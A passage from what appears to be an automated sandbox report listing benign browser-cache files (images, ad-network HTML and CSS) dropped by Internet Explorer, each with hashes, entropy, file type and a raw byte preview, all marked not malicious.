                                                                                                                                                                                                  SHA1:09CE746C64EE71DCDA199F9A22278B8880528939
                                                                                                                                                                                                  SHA-256:C353000A27843A119039D019F19D207EE197966894161324706A5192A4A018D3
                                                                                                                                                                                                  SHA-512:660FDE09D436922333A302D7FEE5E195F852E5956CA23CF19448C051878E6505F64EC80005B6CB2841FBB3BA72943DCB52D1E1BEDCD90CAEAE5D2D2F486C9895
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..qJ.;..f..z...)..J.....R.O...q4GHE?..S....E8.LU\...E.(..&.qI.v(.......b.S.Xn(.;.b...1N...,7.b..1E..1F).iv..H.K.~.6.p.-..<...T...V.W:.Y]....+RXp:Uf...7`H.....f/j.^.s.....V....#MH....M.o.4.M>by.Sm&...J>.}(..f.[(.W..}(.1...~.vS..~..Z....|.,..G....aU.i...c...nc.b<..t.O.......P..H.r.#TF8.)Z..W.LE`.qV.$6..'....OR..K.{V...eE(...g;;3..etgyF..>..-}.~.})s......J_$.V..>..
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1bmeBM[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7931
                                                                                                                                                                                                  Entropy (8bit):7.935774500245829
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:BCTKhyDBE7R+xdLFEVkUgzerP9Lb6DuDTpIYsitI7jcz:k8yDB8a3+RSez94gdIYvtI7jW
                                                                                                                                                                                                  MD5:6DE9A1D7BEDB2AC043B84A3E6D350E18
                                                                                                                                                                                                  SHA1:F5544D3247E71CE6A6209D04BD536F81B009A7B9
                                                                                                                                                                                                  SHA-256:5D89E9F74504CFE61D3F39DBC41160D1476A573E75B6E8B0426F78E7539EA901
                                                                                                                                                                                                  SHA-512:66BA0B098EAF3F608E8CB577D6FC6D1A8D425567CEA527BAD90F4BC09121C443EEC3B038BB863AE6FA2B73324DC3AB2D8EF168CD05F49D17EA8DAE1FB933320A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..$...VmKp....3..x..Wtn.z?.SVj..l.......[.}....../.P[\..l...A.....E2./QL.4I.CRTqt5%.aHz.ZC.....QE...2..QHAP7.?Z..o.~...S'...L.p}(...*.k6.o..{p..ng...tt.r. ....,..1....I.u.....U.|..;.B..L....Cq...l..........D..........Q.R-d].b....@.....?.Z..........hWJ.E/QL...T[.v....M.CO..F}3P...v.*..^s....~..[...I\.....CQ[...u..S....T.-Y...Q@.*..E.R.T.........0BS'.,{..>
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1bmf1B[1].jpg
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17727
                                                                                                                                                                                                  Entropy (8bit):7.963986659297397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:evk9B8JESSdj8AYLvfr6LpijmmdPcj0ElurXz7sY85rlnW2FJehvLhgp:es9B82SM+LW/mlcwEArXPsBrlWAehu
                                                                                                                                                                                                  MD5:953D4788997C006A15B44E09F00340BD
                                                                                                                                                                                                  SHA1:BECDD42B9E0A14938DE366570A552FB9CF349BE4
                                                                                                                                                                                                  SHA-256:B5DD3630DFF9FFE04E6528AFC95A5FC4DE6AEAAA10FC2EF275E590CD2D03A34E
                                                                                                                                                                                                  SHA-512:1844256C80ACE4EC63E9EB21E7B4EE0D32E0C4B7DB84DE1BD2251855E9FB842AFF9804C48AAD46BBAED81182A1FBD3C71284271B56B6B08636A84EAC58472081
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...*1L.....8..nW. .....u.}...P....H..DO....).qR.:c5.(.@$.q.0#h....Gz.n&...zU.M..c.4....X....j..V#..'h9..;.3`.b?J../E#?.8.......7.u.-....N.T..3..<.qN..H.4...YpW....@. g......".$c..'...N...c....1.5g.#.)QM3F..#.pE&.I..T.;w.I.2..7p.aF..H..8.|......w(...].D..#.i.[.....X.l.Fx..T...{.v*M....:SVG(.t=A....9.z.i.Y.p:.s...I.O.{.....'!.....#i.{Ug@.....'..jV#..[.N;f..;..P
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB1kc8s[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):799
                                                                                                                                                                                                  Entropy (8bit):7.616735751178749
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ee//6FAU+ZPhOPnAgOydY9vYyfS1Y+OyGo0VtgzKkcbqeGOrlkTR+a1eXGyI:QGp+Zpajd4/ObGPngzKkcOSnGLT
                                                                                                                                                                                                  MD5:2C55F358C8213245D8DE540D89B76ED0
                                                                                                                                                                                                  SHA1:413A0EA00DBB2A54C6A3933B8864E1847D795124
                                                                                                                                                                                                  SHA-256:D11901D46370D97173C94754B69E90D7540FAF1F5C571C5E521E3A062FBF0A77
                                                                                                                                                                                                  SHA-512:0385C2FE61CFFF69EE6A85D13003B4729B93132007294DF3407DAAB97318157C421940D689E01B6CE5360A57029393FEAB949A83647DF22D43DF5064E7B82DD0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK.kZQ....W.Vc.-m,...&`....`."....b...%...E2...&.R*...*...A0......d."......>o-i....~...9...=?.!C.\{.j.bmmMR.V_.D......P(..j.*.Z-]..?...uV_...>.o.e.o..a.d21....|>..mh4..J...........g..H.......;..C.R..."........J....Q.9..^.......8>??O.zo.Z.h4.N...r9...).......>R.9...Kz..W.T....J.w.3fee..*a; ......+.X._]]....?q.\w.Ri.n.............p...CJ.N.Y....l:..).......d2.5..1.3d....\.s....6....nQ..Q...E..d.......l..B!2...G".H&..........ag5..ZR^..0.p.......4...\.2...6.....).........Xj.Ex.n.....&.Z.d.X..#V.b..lll..[...&''i........x....*8...w3..=.A...E..M.T..!8...Q(....L6)..r........h4..>......yj...j.9.:....f..+'._#......j..I...&.0.H4....<R...:....7.Y...n.......Z.s..2.....#A.j:s.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB4j8lS[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):502
                                                                                                                                                                                                  Entropy (8bit):7.275090598817661
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/kFqpMa5RkFIIAugOKv/pWdYG0VvgUnWevayqc:ofwzbx+D0VXWevayqc
                                                                                                                                                                                                  MD5:B5EE375D16BF365C12D70B587E622965
                                                                                                                                                                                                  SHA1:456F47ACEA559A58301BB22B1A97BA46EA4527FB
                                                                                                                                                                                                  SHA-256:757CC784CB24EB8903E4BF6751C6E221304D43E0018B720067E92C5CC69D07EE
                                                                                                                                                                                                  SHA-512:04E0FE5CC08811F02883B8C682F428A1490A8C87B1742F3E26AD08A806F13EAAC494E964792CE0F1604D4F95E75F364CA1CBC927E41EF4B867D421B31E13FE83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O.._J.@..gv.*".=...P..Ui..E.....>.f.7.J.../...T........ ..b..nC.*..{.o....,....Qx\.C..J%.M..M.r.....6|.K..+...6....F...g...Z..N....G_.....@....R9.>.A9..mf.2w..N..4B....)..gm.......2e..b.&~.z....q..~s1P.... ...C.k"c....9.....q5..#EM...^..T....`.J..0..l<.8.%.G..9.....c....l....D..8...<.F2.a...7..p..1..5.]n .^...-+cDML....D.[N."..6.@E..=&^.J....<"..L ........@....27...B..].......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB6Ma4a[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):396
                                                                                                                                                                                                  Entropy (8bit):6.789155851158018
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
                                                                                                                                                                                                  MD5:6D4A6F49A9B752ED252A81E201B7DB38
                                                                                                                                                                                                  SHA1:765E36638581717C254DB61456060B5A3103863A
                                                                                                                                                                                                  SHA-256:500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
                                                                                                                                                                                                  SHA-512:34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....!IDAT8Oc|. ..?...|.UA....GP.*`|. ......E...b.....&.>..*x.h....c.....g.N...?5.1.8p.....>1..p...0.EA.A...0...cC/...0Ai8...._....p.....)....2...AE....Y?.......8p..d......$1l.%.8.<.6..Lf..a.........%.....-.q...8...4...."...`5..G!.|..L....p8 ...p.......P....,..l.(..C]@L.#....P...)......8......[.7MZ.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB7gRE[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):482
                                                                                                                                                                                                  Entropy (8bit):7.256101581196474
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
                                                                                                                                                                                                  MD5:307888C0F03ED874ED5C1D0988888311
                                                                                                                                                                                                  SHA1:D6FB271D70665455A0928A93D2ABD9D9C0F4E309
                                                                                                                                                                                                  SHA-256:D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
                                                                                                                                                                                                  SHA-512:6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.*3. .!..p..,.c.>.\<H.0.*...,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB7hg4[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):458
                                                                                                                                                                                                  Entropy (8bit):7.172312008412332
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
                                                                                                                                                                                                  MD5:A4F438CAD14E0E2CA9EEC23174BBD16A
                                                                                                                                                                                                  SHA1:41FC65053363E0EEE16DD286C60BEDE6698D96B3
                                                                                                                                                                                                  SHA-256:9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
                                                                                                                                                                                                  SHA-512:FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..*$Mf..j.*n.*~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T.*.Z_..'.}..rc....(...9V.&.....|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BB7hjL[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):444
                                                                                                                                                                                                  Entropy (8bit):7.25373742182796
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPkR/CnFFDDRHbMgYjEr710UbCO8j+qom62fke5YCsd8sKCW5biVp:6v/78/kFFlcjEN0sCoqoX4ke5V6D+bi7
                                                                                                                                                                                                  MD5:D02BB2168E72B702ECDD93BF868B4190
                                                                                                                                                                                                  SHA1:9FB22D0AB1AAA390E0AFF5B721013E706D731BF3
                                                                                                                                                                                                  SHA-256:D2750B6BEE5D9BA31AFC66126EECB39099EF6C7E619DB72775B3E0E2C8C64A6F
                                                                                                                                                                                                  SHA-512:6A801305D1D1E8448EEB62BC7062E6ED7297000070CA626FC32F5E0A3B8C093472BE72654C3552DA2648D8A491568376F3F2AC4EA0135529C96482ECF2B2FD35
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....QIDAT8O....DA.....F...md5"...R%6.].@.............D.....Q...}s.0...~.7svv.......;.%..\.....]...LK$...!.u....3.M.+.U..a..~O......O.XR=.s.../....I....l.=9$...........~A.,. ..<...Yq.9.8...I.&.....V. ..M.\..V6.....O.........!y:p.9..l......"9.....9.7.N.o^[..d......]g.%..L.1...B.1k....k....v#._.w/...w...h..\....W...../..S.`.f.......IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBOLLMj[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):507
                                                                                                                                                                                                  Entropy (8bit):7.140014669230146
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/78/soC6yG9YjUiWGS3Sw38Cztj2ChFblexnDizTGN:RCMnX3fxzhhqxn8TGN
                                                                                                                                                                                                  MD5:25D424F126A464CA028C0C9BA692ADA9
                                                                                                                                                                                                  SHA1:E54F845D1099C8D7B7BA0C5E9B57DFA7163CE95C
                                                                                                                                                                                                  SHA-256:E0DF9CDAFF2557C7B555FFAED40B7E553FF6C50DD58FE79C27B3AA69CC56258D
                                                                                                                                                                                                  SHA-512:7E72F13B354AA5EE99EC50057DB2BFBC35A78D5617A36ED90864D1DA6AC1B692301115EF8F44255AB3894142D6C0F634A2CFD44EBCD00B039DC628F751579DC3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8Oc.v.............g8......'.......X].............l.....z..]\.|d...i5U`.,,,......~.f.+-ax..5T..`....S.M{......d..w?...1..?..Vo...G....>z.L...2..10222.::1...1....,..0.........``b.HgFE3<;z..,5..G.,P...........t..Y._.}...TT..}.l..0..j......%..^.{.f.9;c....aAA0...w0]....ag.fc...(HK...>0....!=".AMQ.,..`......y...8.a....k.D..`..J8..!`....|.R...@S.,..0...&..2...0.8t.....yq..B...Wo..@...F..........ks.....IEND.B`.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\BBPfCZL[1].png
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2313
                                                                                                                                                                                                  Entropy (8bit):7.594679301225926
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                  MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                  SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                  SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                  SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: GIF89a2.2.....7..;..?..C..I..H..<..9.....8..F..7..E..@..C..@..6..9..8..J..*z.G..>..?..A..6..>..8..:..A..=..B..4..B..D..=..K..=..@..<..:..3~.B..D.....,|.4..2..6..:..J..;..G....Fl..1}.4..R.....Y..E..>..9..5..X..A..2..P..J../|.9.....T.+Z.....+..<.Fq.Gn..V..;..7.Lr..W..C..<.Fp.]......A.....0{.L..E..H..@.....3..3..O..M..K....#[.3i..D..>........I....<n..;..Z..1..G..8..E....Hu..1..>..T..a.Fs..C..8..0}....;..6..t.Ft..5.Bi..:.x...E.....'z^~.......[....8`..........;..@..B.....7.....<.................F.....6...........>..?.n......g.......s...)a.Cm....'a.0Z..7....3f..<.:e.....@.q.....Ds..B....!P.n...J............Li..=......F.....B.....:r....w..|..........`..[}.g...J.Ms..K.Ft.....'..>..........Ry.Nv.n..]..Bl........S..;....Dj.....=.....O.y.......6..J.......)V..g..5.......!..NETSCAPE2.0.....!...d...,....2.2........3.`..9.(|.d.C .wH.(."D...(D.....d.Y......<.(PP.F...dL.@.&.28..$1S....*TP......>...L..!T.X!.(..@a..IsgM..|..Jc(Q.+.......2.:.)y2.J......W,..eW2.!....!....C.....d...zeh....P.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\auction[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20021
                                                                                                                                                                                                  Entropy (8bit):5.749531868688612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Bj0ztOGze1h0RoQ574xh0ubNsFgU6Hx21rIN9z1wiREUTDLsu7Fj:BcOxhVUuBsoR+UWU/woV
                                                                                                                                                                                                  MD5:45174A849816551B550753501FD86BDC
                                                                                                                                                                                                  SHA1:948F8363D6145825C8E74320019572C51CCB4E09
                                                                                                                                                                                                  SHA-256:29E57DB7D864CC8EE7A23B8D63A2076233E1F03A23D41E2154954C5CD2B71830
                                                                                                                                                                                                  SHA-512:F3C5EA9DD3AD65B0745558EA7AC68EA6C8362B1D21CBB66BDF194F8F61B26AE317A11332892DE2CBFD63EF996099F8ED4C274AE4C15D6C1CFEAB0D0E771DFAE0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_7606eb8b472e5b3013c75fc89536c34b_5f0ad531-0c66-4193-abe9-6ef6e1a5c53e-tuct6b822a1_1606327585_1606327585_CIi3jgYQr4c_GLbX-IfUsuWhNSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;},&quot;tbsessionid&quot;:&quot;v2_7606eb8b472e5b3013c75fc89536c34b_5f0ad531-0c66-4193-abe9-6ef6e1a5c53e-tuct6b822a1_1606327585_1606327585_CIi3jgYQr4c_GLbX-IfUsuWhNSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAQ&quot;,&quot;pageViewId&quot;:&quot;1324f90d4a0344e98cea8af65fafbbd3&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">.</script>.<li class="triptych serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;taboola&quot;,&quot;e&quot;:true}" data-provider="taboola" data-ad-region="infopane" data-ad-index="3" data-viewability="">.<
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\checksync[1].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20537
                                                                                                                                                                                                  Entropy (8bit):5.298606813221356
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kOAG36OllD7XFe0uvg2f5vzBgF3OZOjQWwY4RXrqt:f93D5GY2RmF3OsjQWwY4RXrqt
                                                                                                                                                                                                  MD5:2E8E023F862C5E446EA77929603D4CCC
                                                                                                                                                                                                  SHA1:E493799CE0E9F9CAAAA10757B67F56D714F6B640
                                                                                                                                                                                                  SHA-256:D15675A57DF77672F1F889C6C15C33F8C43AA01B0CB9AE46ED527EB5DA32512F
                                                                                                                                                                                                  SHA-512:F8BA12BC15C4643B9815EFD422E2371689723BC471F4F9E9C6E5DC45E66F83356FF00AE4F122757BAD027F57E2B26CDAA32B24F608204465A089D7AE4A103472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\checksync[2].htm
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20537
                                                                                                                                                                                                  Entropy (8bit):5.298606813221356
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kOAG36OllD7XFe0uvg2f5vzBgF3OZOjQWwY4RXrqt:f93D5GY2RmF3OsjQWwY4RXrqt
                                                                                                                                                                                                  MD5:2E8E023F862C5E446EA77929603D4CCC
                                                                                                                                                                                                  SHA1:E493799CE0E9F9CAAAA10757B67F56D714F6B640
                                                                                                                                                                                                  SHA-256:D15675A57DF77672F1F889C6C15C33F8C43AA01B0CB9AE46ED527EB5DA32512F
                                                                                                                                                                                                  SHA-512:F8BA12BC15C4643B9815EFD422E2371689723BC471F4F9E9C6E5DC45E66F83356FF00AE4F122757BAD027F57E2B26CDAA32B24F608204465A089D7AE4A103472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":72,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mwf-west-european-default.min[1].css
                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):563851
                                                                                                                                                                                                  Entropy (8bit):5.221453271093944
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:2VR57iqbPXlB5UR5vWenR5xWeMFdBjL+ks0EcU0MWEsuWe5fXbHfxlN/FNCn/Lpl:tTP0BKYtf
                                                                                                                                                                                                  MD5:12DD1E4D0485A80184B36D158018DE81
                                                                                                                                                                                                  SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
